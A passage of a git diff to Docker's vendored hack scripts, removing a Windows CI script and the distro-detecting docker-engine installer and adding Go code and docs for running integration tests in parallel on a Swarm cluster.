Azure nodes on the latest version -# - Make sure we are not running as local system. Can't do until all Azure nodes are updated. -# - Error if docker versions are not equal. Can't do until all Azure nodes are updated -# - Error if go versions are not equal. Can't do until all Azure nodes are updated. -# - Error if running 32-bit posix tools. Probably can take from bash --version and check contains "x86_64" -# - Warn if the CI directory cannot be deleted afterwards. Otherwise turdlets are left behind -# - Use %systemdrive% ($SYSTEMDRIVE) rather than hard code to c: for TEMP -# - Consider cross builing the Windows binary and copy across. That's a bit of a heavy lift. Only reason -# for doing that is that it mirrors the actual release process for docker.exe which is cross-built. -# However, should absolutely not be a problem if built natively, so nit-picking. -# - Tidy up of images and containers. Either here, or in the teardown script. - -ec=0 -uniques=1 -echo INFO: Started at `date`. Script version $SCRIPT_VER - - -# !README! -# There are two daemons running on the remote Linux host: -# - outer: specified by DOCKER_HOST, this is the daemon that will build and run the inner docker daemon -# from the sources matching the PR. -# - inner: runs on the host network, on a port number similar to that of DOCKER_HOST but the last two digits are inverted -# (2357 if DOCKER_HOST had port 2375; and 2367 if DOCKER_HOST had port 2376). -# The windows integration tests are run against this inner daemon. - -# get the ip, inner and outer ports. -ip="${DOCKER_HOST#*://}" -port_outer="${ip#*:}" -# inner port is like outer port with last two digits inverted. -port_inner=$(echo "$port_outer" | sed -E 's/(.)(.)$/\2\1/') -ip="${ip%%:*}" - -echo "INFO: IP=$ip PORT_OUTER=$port_outer PORT_INNER=$port_inner" - -# If TLS is enabled -if [ -n "$DOCKER_TLS_VERIFY" ]; then - protocol=https - if [ -z "$DOCKER_MACHINE_NAME" ]; then - ec=1 - echo "ERROR: DOCKER_MACHINE_NAME is undefined" - fi - certs=$(echo ~/.docker/machine/machines/$DOCKER_MACHINE_NAME) - curlopts="--cacert $certs/ca.pem --cert $certs/cert.pem --key $certs/key.pem" - run_extra_args="-v tlscerts:/etc/docker" - daemon_extra_args="--tlsverify --tlscacert /etc/docker/ca.pem --tlscert /etc/docker/server.pem --tlskey /etc/docker/server-key.pem" -else - protocol=http -fi - -# Save for use by make.sh and scripts it invokes -export MAIN_DOCKER_HOST="tcp://$ip:$port_inner" - -# Verify we can get the remote node to respond to _ping -if [ $ec -eq 0 ]; then - reply=`curl -s $curlopts $protocol://$ip:$port_outer/_ping` - if [ "$reply" != "OK" ]; then - ec=1 - echo "ERROR: Failed to get an 'OK' response from the docker daemon on the Linux node" - echo " at $ip:$port_outer when called with an http request for '_ping'. This implies that" - echo " either the daemon has crashed/is not running, or the Linux node is unavailable." - echo - echo " A regular ping to the remote Linux node is below. It should reply. If not, the" - echo " machine cannot be reached at all and may have crashed. If it does reply, it is" - echo " likely a case of the Linux daemon not running or having crashed, which requires" - echo " further investigation." - echo - echo " Try re-running this CI job, or ask on #docker-dev or #docker-maintainers" - echo " for someone to perform further diagnostics, or take this node out of rotation." - echo - ping $ip - else - echo "INFO: The Linux nodes outer daemon replied to a ping. Good!" - fi -fi - -# Get the version from the remote node. Note this may fail if jq is not installed. -# That's probably worth checking to make sure, just in case. -if [ $ec -eq 0 ]; then - remoteVersion=`curl -s $curlopts $protocol://$ip:$port_outer/version | jq -c '.Version'` - echo "INFO: Remote daemon is running docker version $remoteVersion" -fi - -# Compare versions. We should really fail if result is no 1. Output at end of script. -if [ $ec -eq 0 ]; then - uniques=`docker version | grep Version | /usr/bin/sort -u | wc -l` -fi - -# Make sure we are in repo -if [ $ec -eq 0 ]; then - if [ ! -d hack ]; then - echo "ERROR: Are you sure this is being launched from a the root of docker repository?" - echo " If this is a Windows CI machine, it should be c:\jenkins\gopath\src\github.com\docker\docker." - echo " Current directory is `pwd`" - ec=1 - fi -fi - -# Are we in split binary mode? -if [ `grep DOCKER_CLIENTONLY Makefile | wc -l` -gt 0 ]; then - splitBinary=0 - echo "INFO: Running in single binary mode" -else - splitBinary=1 - echo "INFO: Running in split binary mode" -fi - - -# Get the commit has and verify we have something -if [ $ec -eq 0 ]; then - export COMMITHASH=$(git rev-parse --short HEAD) - echo INFO: Commmit hash is $COMMITHASH - if [ -z $COMMITHASH ]; then - echo "ERROR: Failed to get commit hash. Are you sure this is a docker repository?" - ec=1 - fi -fi - -# Redirect to a temporary location. Check is here for local runs from Jenkins machines just in case not -# in the right directory where the repo is cloned. We also redirect TEMP to not use the environment -# TEMP as when running as a standard user (not local system), it otherwise exposes a bug in posix tar which -# will cause CI to fail from Windows to Linux. Obviously it's not best practice to ever run as local system... -if [ $ec -eq 0 ]; then - export TEMP=/c/CI/CI-$COMMITHASH - export TMP=$TEMP - /usr/bin/mkdir -p $TEMP # Make sure Linux mkdir for -p -fi - -# Tidy up time -if [ $ec -eq 0 ]; then - echo INFO: Deleting pre-existing containers and images... - - # Force remove all containers based on a previously built image with this commit - ! docker rm -f $(docker ps -aq --filter "ancestor=docker:$COMMITHASH") &>/dev/null - - # Force remove any container with this commithash as a name - ! docker rm -f $(docker ps -aq --filter "name=docker-$COMMITHASH") &>/dev/null - - # This SHOULD never happen, but just in case, also blow away any containers - # that might be around. - ! if [ ! $(docker ps -aq | wc -l) -eq 0 ]; then - echo WARN: There were some leftover containers. Cleaning them up. - ! docker rm -f $(docker ps -aq) - fi - - # Force remove the image if it exists - ! docker rmi -f "docker-$COMMITHASH" &>/dev/null -fi - -# Provide the docker version for debugging purposes. If these fail, game over. -# as the Linux box isn't responding for some reason. -if [ $ec -eq 0 ]; then - echo INFO: Docker version and info of the outer daemon on the Linux node - echo - docker version - ec=$? - if [ 0 -ne $ec ]; then - echo "ERROR: The main linux daemon does not appear to be running. Has the Linux node crashed?" - fi - echo -fi - -# Same as above, but docker info -if [ $ec -eq 0 ]; then - echo - docker info - ec=$? - if [ 0 -ne $ec ]; then - echo "ERROR: The main linux daemon does not appear to be running. Has the Linux node crashed?" - fi - echo -fi - -# build the daemon image -if [ $ec -eq 0 ]; then - echo "INFO: Running docker build on Linux host at $DOCKER_HOST" - if [ $splitBinary -eq 0 ]; then - set -x - docker build --rm --force-rm --build-arg APT_MIRROR=cdn-fastly.deb.debian.org -t "docker:$COMMITHASH" . - cat < 0 ? 1 : 0 )) -done - -case "$mirror" in - AzureChinaCloud) - apt_url="https://mirror.azure.cn/docker-engine/apt" - yum_url="https://mirror.azure.cn/docker-engine/yum" - ;; -esac - -command_exists() { - command -v "$@" > /dev/null 2>&1 -} - -echo_docker_as_nonroot() { - if command_exists docker && [ -e /var/run/docker.sock ]; then - ( - set -x - $sh_c 'docker version' - ) || true - fi - your_user=your-user - [ "$user" != 'root' ] && your_user="$user" - # intentionally mixed spaces and tabs here -- tabs are stripped by "<<-EOF", spaces are kept in the output - cat <<-EOF - - If you would like to use Docker as a non-root user, you should now consider - adding your user to the "docker" group with something like: - - sudo usermod -aG docker $your_user - - Remember that you will have to log out and back in for this to take effect! - - EOF -} - -# Check if this is a forked Linux distro -check_forked() { - - # Check for lsb_release command existence, it usually exists in forked distros - if command_exists lsb_release; then - # Check if the `-u` option is supported - set +e - lsb_release -a -u > /dev/null 2>&1 - lsb_release_exit_code=$? - set -e - - # Check if the command has exited successfully, it means we're in a forked distro - if [ "$lsb_release_exit_code" = "0" ]; then - # Print info about current distro - cat <<-EOF - You're using '$lsb_dist' version '$dist_version'. - EOF - - # Get the upstream release info - lsb_dist=$(lsb_release -a -u 2>&1 | tr '[:upper:]' '[:lower:]' | grep -E 'id' | cut -d ':' -f 2 | tr -d '[[:space:]]') - dist_version=$(lsb_release -a -u 2>&1 | tr '[:upper:]' '[:lower:]' | grep -E 'codename' | cut -d ':' -f 2 | tr -d '[[:space:]]') - - # Print info about upstream distro - cat <<-EOF - Upstream release is '$lsb_dist' version '$dist_version'. - EOF - else - if [ -r /etc/debian_version ] && [ "$lsb_dist" != "ubuntu" ] && [ "$lsb_dist" != "raspbian" ]; then - # We're Debian and don't even know it! - lsb_dist=debian - dist_version="$(cat /etc/debian_version | sed 's/\/.*//' | sed 's/\..*//')" - case "$dist_version" in - 9) - dist_version="stretch" - ;; - 8|'Kali Linux 2') - dist_version="jessie" - ;; - 7) - dist_version="wheezy" - ;; - esac - fi - fi - fi -} - -rpm_import_repository_key() { - local key=$1; shift - local tmpdir=$(mktemp -d) - chmod 600 "$tmpdir" - for key_server in $key_servers ; do - gpg --homedir "$tmpdir" --keyserver "$key_server" --recv-keys "$key" && break - done - gpg --homedir "$tmpdir" -k "$key" >/dev/null - gpg --homedir "$tmpdir" --export --armor "$key" > "$tmpdir"/repo.key - rpm --import "$tmpdir"/repo.key - rm -rf "$tmpdir" -} - -semverParse() { - major="${1%%.*}" - minor="${1#$major.}" - minor="${minor%%.*}" - patch="${1#$major.$minor.}" - patch="${patch%%[-.]*}" -} - -do_install() { - architecture=$(uname -m) - case $architecture in - # officially supported - amd64|x86_64) - ;; - # unofficially supported with available repositories - armv6l|armv7l) - ;; - # unofficially supported without available repositories - aarch64|arm64|ppc64le|s390x) - cat 1>&2 <<-EOF - Error: Docker doesn't officially support $architecture and no Docker $architecture repository exists. - EOF - exit 1 - ;; - # not supported - *) - cat >&2 <<-EOF - Error: $architecture is not a recognized platform. - EOF - exit 1 - ;; - esac - - if command_exists docker; then - version="$(docker -v | cut -d ' ' -f3 | cut -d ',' -f1)" - MAJOR_W=1 - MINOR_W=10 - - semverParse $version - - shouldWarn=0 - if [ $major -lt $MAJOR_W ]; then - shouldWarn=1 - fi - - if [ $major -le $MAJOR_W ] && [ $minor -lt $MINOR_W ]; then - shouldWarn=1 - fi - - cat >&2 <<-'EOF' - Warning: the "docker" command appears to already exist on this system. - - If you already have Docker installed, this script can cause trouble, which is - why we're displaying this warning and provide the opportunity to cancel the - installation. - - If you installed the current Docker package using this script and are using it - EOF - - if [ $shouldWarn -eq 1 ]; then - cat >&2 <<-'EOF' - again to update Docker, we urge you to migrate your image store before upgrading - to v1.10+. - - You can find instructions for this here: - https://github.com/docker/docker/wiki/Engine-v1.10.0-content-addressability-migration - EOF - else - cat >&2 <<-'EOF' - again to update Docker, you can safely ignore this message. - EOF - fi - - cat >&2 <<-'EOF' - - You may press Ctrl+C now to abort this script. - EOF - ( set -x; sleep 20 ) - fi - - user="$(id -un 2>/dev/null || true)" - - sh_c='sh -c' - if [ "$user" != 'root' ]; then - if command_exists sudo; then - sh_c='sudo -E sh -c' - elif command_exists su; then - sh_c='su -c' - else - cat >&2 <<-'EOF' - Error: this installer needs the ability to run commands as root. - We are unable to find either "sudo" or "su" available to make this happen. - EOF - exit 1 - fi - fi - - curl='' - if command_exists curl; then - curl='curl -sSL' - elif command_exists wget; then - curl='wget -qO-' - elif command_exists busybox && busybox --list-modules | grep -q wget; then - curl='busybox wget -qO-' - fi - - # check to see which repo they are trying to install from - if [ -z "$repo" ]; then - repo='main' - if [ "https://test.docker.com/" = "$url" ]; then - repo='testing' - elif [ "https://experimental.docker.com/" = "$url" ]; then - repo='experimental' - fi - fi - - # perform some very rudimentary platform detection - lsb_dist='' - dist_version='' - if command_exists lsb_release; then - lsb_dist="$(lsb_release -si)" - fi - if [ -z "$lsb_dist" ] && [ -r /etc/lsb-release ]; then - lsb_dist="$(. /etc/lsb-release && echo "$DISTRIB_ID")" - fi - if [ -z "$lsb_dist" ] && [ -r /etc/debian_version ]; then - lsb_dist='debian' - fi - if [ -z "$lsb_dist" ] && [ -r /etc/fedora-release ]; then - lsb_dist='fedora' - fi - if [ -z "$lsb_dist" ] && [ -r /etc/oracle-release ]; then - lsb_dist='oracleserver' - fi - if [ -z "$lsb_dist" ] && [ -r /etc/centos-release ]; then - lsb_dist='centos' - fi - if [ -z "$lsb_dist" ] && [ -r /etc/redhat-release ]; then - lsb_dist='redhat' - fi - if [ -z "$lsb_dist" ] && [ -r /etc/photon-release ]; then - lsb_dist='photon' - fi - if [ -z "$lsb_dist" ] && [ -r /etc/os-release ]; then - lsb_dist="$(. /etc/os-release && echo "$ID")" - fi - - lsb_dist="$(echo "$lsb_dist" | tr '[:upper:]' '[:lower:]')" - - # Special case redhatenterpriseserver - if [ "${lsb_dist}" = "redhatenterpriseserver" ]; then - # Set it to redhat, it will be changed to centos below anyways - lsb_dist='redhat' - fi - - case "$lsb_dist" in - - ubuntu) - if command_exists lsb_release; then - dist_version="$(lsb_release --codename | cut -f2)" - fi - if [ -z "$dist_version" ] && [ -r /etc/lsb-release ]; then - dist_version="$(. /etc/lsb-release && echo "$DISTRIB_CODENAME")" - fi - ;; - - debian|raspbian) - dist_version="$(cat /etc/debian_version | sed 's/\/.*//' | sed 's/\..*//')" - case "$dist_version" in - 8) - dist_version="jessie" - ;; - 7) - dist_version="wheezy" - ;; - esac - ;; - - oracleserver) - # need to switch lsb_dist to match yum repo URL - lsb_dist="oraclelinux" - dist_version="$(rpm -q --whatprovides redhat-release --queryformat "%{VERSION}\n" | sed 's/\/.*//' | sed 's/\..*//' | sed 's/Server*//')" - ;; - - fedora|centos|redhat) - dist_version="$(rpm -q --whatprovides ${lsb_dist}-release --queryformat "%{VERSION}\n" | sed 's/\/.*//' | sed 's/\..*//' | sed 's/Server*//' | sort | tail -1)" - ;; - - "vmware photon") - lsb_dist="photon" - dist_version="$(. /etc/os-release && echo "$VERSION_ID")" - ;; - - *) - if command_exists lsb_release; then - dist_version="$(lsb_release --codename | cut -f2)" - fi - if [ -z "$dist_version" ] && [ -r /etc/os-release ]; then - dist_version="$(. /etc/os-release && echo "$VERSION_ID")" - fi - ;; - - - esac - - # Check if this is a forked Linux distro - check_forked - - # Run setup for each distro accordingly - case "$lsb_dist" in - ubuntu|debian|raspbian) - export DEBIAN_FRONTEND=noninteractive - - did_apt_get_update= - apt_get_update() { - if [ -z "$did_apt_get_update" ]; then - ( set -x; $sh_c 'sleep 3; apt-get update' ) - did_apt_get_update=1 - fi - } - - if [ "$lsb_dist" != "raspbian" ]; then - # aufs is preferred over devicemapper; try to ensure the driver is available. - if ! grep -q aufs /proc/filesystems && ! $sh_c 'modprobe aufs'; then - if uname -r | grep -q -- '-generic' && dpkg -l 'linux-image-*-generic' | grep -qE '^ii|^hi' 2>/dev/null; then - kern_extras="linux-image-extra-$(uname -r) linux-image-extra-virtual" - - apt_get_update - ( set -x; $sh_c 'sleep 3; apt-get install -y -q '"$kern_extras" ) || true - - if ! grep -q aufs /proc/filesystems && ! $sh_c 'modprobe aufs'; then - echo >&2 'Warning: tried to install '"$kern_extras"' (for AUFS)' - echo >&2 ' but we still have no AUFS. Docker may not work. Proceeding anyways!' - ( set -x; sleep 10 ) - fi - else - echo >&2 'Warning: current kernel is not supported by the linux-image-extra-virtual' - echo >&2 ' package. We have no AUFS support. Consider installing the packages' - echo >&2 ' linux-image-virtual kernel and linux-image-extra-virtual for AUFS support.' - ( set -x; sleep 10 ) - fi - fi - fi - - # install apparmor utils if they're missing and apparmor is enabled in the kernel - # otherwise Docker will fail to start - if [ "$(cat /sys/module/apparmor/parameters/enabled 2>/dev/null)" = 'Y' ]; then - if command -v apparmor_parser >/dev/null 2>&1; then - echo 'apparmor is enabled in the kernel and apparmor utils were already installed' - else - echo 'apparmor is enabled in the kernel, but apparmor_parser is missing. Trying to install it..' - apt_get_update - ( set -x; $sh_c 'sleep 3; apt-get install -y -q apparmor' ) - fi - fi - - if [ ! -e /usr/lib/apt/methods/https ]; then - apt_get_update - ( set -x; $sh_c 'sleep 3; apt-get install -y -q apt-transport-https ca-certificates' ) - fi - if [ -z "$curl" ]; then - apt_get_update - ( set -x; $sh_c 'sleep 3; apt-get install -y -q curl ca-certificates' ) - curl='curl -sSL' - fi - if ! command -v gpg > /dev/null; then - apt_get_update - ( set -x; $sh_c 'sleep 3; apt-get install -y -q gnupg2 || apt-get install -y -q gnupg' ) - fi - - # dirmngr is a separate package in ubuntu yakkety; see https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1634464 - if ! command -v dirmngr > /dev/null; then - apt_get_update - ( set -x; $sh_c 'sleep 3; apt-get install -y -q dirmngr' ) - fi - - ( - set -x - for key_server in $key_servers ; do - $sh_c "apt-key adv --keyserver hkp://${key_server}:80 --recv-keys ${gpg_fingerprint}" && break - done - $sh_c "apt-key adv -k ${gpg_fingerprint} >/dev/null" - $sh_c "mkdir -p /etc/apt/sources.list.d" - $sh_c "echo deb \[arch=$(dpkg --print-architecture)\] ${apt_url}/repo ${lsb_dist}-${dist_version} ${repo} > /etc/apt/sources.list.d/docker.list" - $sh_c 'sleep 3; apt-get update; apt-get install -y -q docker-engine' - ) - echo_docker_as_nonroot - exit 0 - ;; - - fedora|centos|redhat|oraclelinux|photon) - if [ "${lsb_dist}" = "redhat" ]; then - # we use the centos repository for both redhat and centos releases - lsb_dist='centos' - fi - $sh_c "cat >/etc/yum.repos.d/docker-${repo}.repo" <<-EOF - [docker-${repo}-repo] - name=Docker ${repo} Repository - baseurl=${yum_url}/repo/${repo}/${lsb_dist}/${dist_version} - enabled=1 - gpgcheck=1 - gpgkey=${yum_url}/gpg - EOF - if [ "$lsb_dist" = "fedora" ] && [ "$dist_version" -ge "22" ]; then - ( - set -x - $sh_c 'sleep 3; dnf -y -q install docker-engine' - ) - elif [ "$lsb_dist" = "photon" ]; then - ( - set -x - $sh_c 'sleep 3; tdnf -y install docker-engine' - ) - else - ( - set -x - $sh_c 'sleep 3; yum -y -q install docker-engine' - ) - fi - echo_docker_as_nonroot - exit 0 - ;; - esac - - # intentionally mixed spaces and tabs here -- tabs are stripped by "<<-'EOF'", spaces are kept in the output - cat >&2 <<-'EOF' - - Either your platform is not easily detectable, is not supported by this - installer script (yet - PRs welcome! [hack/install.sh]), or does not yet have - a package for Docker. Please visit the following URL for more detailed - installation instructions: - - https://docs.docker.com/engine/installation/ - - EOF - exit 1 -} - -# wrapped up in a function so that we have some protection against only getting -# half the file during "curl | sh" -do_install diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/README.md b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/README.md new file mode 100644 index 0000000000..4f4f67d4f4 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/README.md @@ -0,0 +1,69 @@ +# Integration Testing on Swarm + +IT on Swarm allows you to execute integration test in parallel across a Docker Swarm cluster + +## Architecture + +### Master service + + - Works as a funker caller + - Calls a worker funker (`-worker-service`) with a chunk of `-check.f` filter strings (passed as a file via `-input` flag, typically `/mnt/input`) + +### Worker service + + - Works as a funker callee + - Executes an equivalent of `TESTFLAGS=-check.f TestFoo|TestBar|TestBaz ... make test-integration` using the bind-mounted API socket (`docker.sock`) + +### Client + + - Controls master and workers via `docker stack` + - No need to have a local daemon + +Typically, the master and workers are supposed to be running on a cloud environment, +while the client is supposed to be running on a laptop, e.g. Docker for Mac/Windows. + +## Requirement + + - Docker daemon 1.13 or later + - Private registry for distributed execution with multiple nodes + +## Usage + +### Step 1: Prepare images + + $ make build-integration-cli-on-swarm + +Following environment variables are known to work in this step: + + - `BUILDFLAGS` + - `DOCKER_INCREMENTAL_BINARY` + +Note: during the transition into Moby Project, you might need to create a symbolic link `$GOPATH/src/github.com/docker/docker` to `$GOPATH/src/github.com/moby/moby`. + +### Step 2: Execute tests + + $ ./hack/integration-cli-on-swarm/integration-cli-on-swarm -replicas 40 -push-worker-image YOUR_REGISTRY.EXAMPLE.COM/integration-cli-worker:latest + +Following environment variables are known to work in this step: + + - `DOCKER_GRAPHDRIVER` + - `DOCKER_EXPERIMENTAL` + +#### Flags + +Basic flags: + + - `-replicas N`: the number of worker service replicas. i.e. degree of parallelism. + - `-chunks N`: the number of chunks. By default, `chunks` == `replicas`. + - `-push-worker-image REGISTRY/IMAGE:TAG`: push the worker image to the registry. Note that if you have only single node and hence you do not need a private registry, you do not need to specify `-push-worker-image`. + +Experimental flags for mitigating makespan nonuniformity: + + - `-shuffle`: Shuffle the test filter strings + +Flags for debugging IT on Swarm itself: + + - `-rand-seed N`: the random seed. This flag is useful for deterministic replaying. By default(0), the timestamp is used. + - `-filters-file FILE`: the file contains `-check.f` strings. By default, the file is automatically generated. + - `-dry-run`: skip the actual workload + - `keep-executor`: do not auto-remove executor containers, which is used for running privileged programs on Swarm diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/Dockerfile b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/Dockerfile new file mode 100644 index 0000000000..1ae228f6ef --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/Dockerfile @@ -0,0 +1,6 @@ +# this Dockerfile is solely used for the master image. +# Please refer to the top-level Makefile for the worker image. +FROM golang:1.7 +ADD . /go/src/github.com/docker/docker/hack/integration-cli-on-swarm/agent +RUN go build -buildmode=pie -o /master github.com/docker/docker/hack/integration-cli-on-swarm/agent/master +ENTRYPOINT ["/master"] diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/call.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/call.go new file mode 100644 index 0000000000..dab9c67077 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/call.go @@ -0,0 +1,132 @@ +package main + +import ( + "encoding/json" + "fmt" + "log" + "strings" + "sync" + "sync/atomic" + "time" + + "github.com/bfirsh/funker-go" + "github.com/docker/docker/hack/integration-cli-on-swarm/agent/types" +) + +const ( + // funkerRetryTimeout is for the issue https://github.com/bfirsh/funker/issues/3 + // When all the funker replicas are busy in their own job, we cannot connect to funker. + funkerRetryTimeout = 1 * time.Hour + funkerRetryDuration = 1 * time.Second +) + +// ticker is needed for some CI (e.g., on Travis, job is aborted when no output emitted for 10 minutes) +func ticker(d time.Duration) chan struct{} { + t := time.NewTicker(d) + stop := make(chan struct{}) + go func() { + for { + select { + case <-t.C: + log.Printf("tick (just for keeping CI job active) per %s", d.String()) + case <-stop: + t.Stop() + } + } + }() + return stop +} + +func executeTests(funkerName string, testChunks [][]string) error { + tickerStopper := ticker(9*time.Minute + 55*time.Second) + defer func() { + close(tickerStopper) + }() + begin := time.Now() + log.Printf("Executing %d chunks in parallel, against %q", len(testChunks), funkerName) + var wg sync.WaitGroup + var passed, failed uint32 + for chunkID, tests := range testChunks { + log.Printf("Executing chunk %d (contains %d test filters)", chunkID, len(tests)) + wg.Add(1) + go func(chunkID int, tests []string) { + defer wg.Done() + chunkBegin := time.Now() + result, err := executeTestChunkWithRetry(funkerName, types.Args{ + ChunkID: chunkID, + Tests: tests, + }) + if result.RawLog != "" { + for _, s := range strings.Split(result.RawLog, "\n") { + log.Printf("Log (chunk %d): %s", chunkID, s) + } + } + if err != nil { + log.Printf("Error while executing chunk %d: %v", + chunkID, err) + atomic.AddUint32(&failed, 1) + } else { + if result.Code == 0 { + atomic.AddUint32(&passed, 1) + } else { + atomic.AddUint32(&failed, 1) + } + log.Printf("Finished chunk %d [%d/%d] with %d test filters in %s, code=%d.", + chunkID, passed+failed, len(testChunks), len(tests), + time.Since(chunkBegin), result.Code) + } + }(chunkID, tests) + } + wg.Wait() + // TODO: print actual tests rather than chunks + log.Printf("Executed %d chunks in %s. PASS: %d, FAIL: %d.", + len(testChunks), time.Since(begin), passed, failed) + if failed > 0 { + return fmt.Errorf("%d chunks failed", failed) + } + return nil +} + +func executeTestChunk(funkerName string, args types.Args) (types.Result, error) { + ret, err := funker.Call(funkerName, args) + if err != nil { + return types.Result{}, err + } + tmp, err := json.Marshal(ret) + if err != nil { + return types.Result{}, err + } + var result types.Result + err = json.Unmarshal(tmp, &result) + return result, err +} + +func executeTestChunkWithRetry(funkerName string, args types.Args) (types.Result, error) { + begin := time.Now() + for i := 0; time.Since(begin) < funkerRetryTimeout; i++ { + result, err := executeTestChunk(funkerName, args) + if err == nil { + log.Printf("executeTestChunk(%q, %d) returned code %d in trial %d", funkerName, args.ChunkID, result.Code, i) + return result, nil + } + if errorSeemsInteresting(err) { + log.Printf("Error while calling executeTestChunk(%q, %d), will retry (trial %d): %v", + funkerName, args.ChunkID, i, err) + } + // TODO: non-constant sleep + time.Sleep(funkerRetryDuration) + } + return types.Result{}, fmt.Errorf("could not call executeTestChunk(%q, %d) in %v", funkerName, args.ChunkID, funkerRetryTimeout) +} + +// errorSeemsInteresting returns true if err does not seem about https://github.com/bfirsh/funker/issues/3 +func errorSeemsInteresting(err error) bool { + boringSubstrs := []string{"connection refused", "connection reset by peer", "no such host", "transport endpoint is not connected", "no route to host"} + errS := err.Error() + for _, boringS := range boringSubstrs { + if strings.Contains(errS, boringS) { + return false + } + } + return true +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/master.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/master.go new file mode 100644 index 0000000000..a0d9a0d381 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/master.go @@ -0,0 +1,65 @@ +package main + +import ( + "errors" + "flag" + "io/ioutil" + "log" + "strings" +) + +func main() { + if err := xmain(); err != nil { + log.Fatalf("fatal error: %v", err) + } +} + +func xmain() error { + workerService := flag.String("worker-service", "", "Name of worker service") + chunks := flag.Int("chunks", 0, "Number of chunks") + input := flag.String("input", "", "Path to input file") + randSeed := flag.Int64("rand-seed", int64(0), "Random seed") + shuffle := flag.Bool("shuffle", false, "Shuffle the input so as to mitigate makespan nonuniformity") + flag.Parse() + if *workerService == "" { + return errors.New("worker-service unset") + } + if *chunks == 0 { + return errors.New("chunks unset") + } + if *input == "" { + return errors.New("input unset") + } + + tests, err := loadTests(*input) + if err != nil { + return err + } + testChunks := chunkTests(tests, *chunks, *shuffle, *randSeed) + log.Printf("Loaded %d tests (%d chunks)", len(tests), len(testChunks)) + return executeTests(*workerService, testChunks) +} + +func chunkTests(tests []string, numChunks int, shuffle bool, randSeed int64) [][]string { + // shuffling (experimental) mitigates makespan nonuniformity + // Not sure this can cause some locality problem.. + if shuffle { + shuffleStrings(tests, randSeed) + } + return chunkStrings(tests, numChunks) +} + +func loadTests(filename string) ([]string, error) { + b, err := ioutil.ReadFile(filename) + if err != nil { + return nil, err + } + var tests []string + for _, line := range strings.Split(string(b), "\n") { + s := strings.TrimSpace(line) + if s != "" { + tests = append(tests, s) + } + } + return tests, nil +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set.go new file mode 100644 index 0000000000..d28c41da7f --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set.go @@ -0,0 +1,28 @@ +package main + +import ( + "math/rand" +) + +// chunkStrings chunks the string slice +func chunkStrings(x []string, numChunks int) [][]string { + var result [][]string + chunkSize := (len(x) + numChunks - 1) / numChunks + for i := 0; i < len(x); i += chunkSize { + ub := i + chunkSize + if ub > len(x) { + ub = len(x) + } + result = append(result, x[i:ub]) + } + return result +} + +// shuffleStrings shuffles strings +func shuffleStrings(x []string, seed int64) { + r := rand.New(rand.NewSource(seed)) + for i := range x { + j := r.Intn(i + 1) + x[i], x[j] = x[j], x[i] + } +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set_test.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set_test.go new file mode 100644 index 0000000000..c172562b1b --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set_test.go @@ -0,0 +1,63 @@ +package main + +import ( + "fmt" + "reflect" + "testing" + "time" +) + +func generateInput(inputLen int) []string { + var input []string + for i := 0; i < inputLen; i++ { + input = append(input, fmt.Sprintf("s%d", i)) + } + + return input +} + +func testChunkStrings(t *testing.T, inputLen, numChunks int) { + t.Logf("inputLen=%d, numChunks=%d", inputLen, numChunks) + input := generateInput(inputLen) + result := chunkStrings(input, numChunks) + t.Logf("result has %d chunks", len(result)) + var inputReconstructedFromResult []string + for i, chunk := range result { + t.Logf("chunk %d has %d elements", i, len(chunk)) + inputReconstructedFromResult = append(inputReconstructedFromResult, chunk...) + } + if !reflect.DeepEqual(input, inputReconstructedFromResult) { + t.Fatal("input != inputReconstructedFromResult") + } +} + +func TestChunkStrings_4_4(t *testing.T) { + testChunkStrings(t, 4, 4) +} + +func TestChunkStrings_4_1(t *testing.T) { + testChunkStrings(t, 4, 1) +} + +func TestChunkStrings_1_4(t *testing.T) { + testChunkStrings(t, 1, 4) +} + +func TestChunkStrings_1000_8(t *testing.T) { + testChunkStrings(t, 1000, 8) +} + +func TestChunkStrings_1000_9(t *testing.T) { + testChunkStrings(t, 1000, 9) +} + +func testShuffleStrings(t *testing.T, inputLen int, seed int64) { + t.Logf("inputLen=%d, seed=%d", inputLen, seed) + x := generateInput(inputLen) + shuffleStrings(x, seed) + t.Logf("shuffled: %v", x) +} + +func TestShuffleStrings_100(t *testing.T) { + testShuffleStrings(t, 100, time.Now().UnixNano()) +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/types/types.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/types/types.go new file mode 100644 index 0000000000..fc598f0330 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/types/types.go @@ -0,0 +1,18 @@ +package types + +// Args is the type for funker args +type Args struct { + // ChunkID is an unique number of the chunk + ChunkID int `json:"chunk_id"` + // Tests is the set of the strings that are passed as `-check.f` filters + Tests []string `json:"tests"` +} + +// Result is the type for funker result +type Result struct { + // ChunkID corresponds to Args.ChunkID + ChunkID int `json:"chunk_id"` + // Code is the exit code + Code int `json:"code"` + RawLog string `json:"raw_log"` +} diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/vendor.conf b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/vendor.conf new file mode 100644 index 0000000000..efd6d6d049 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/vendor.conf @@ 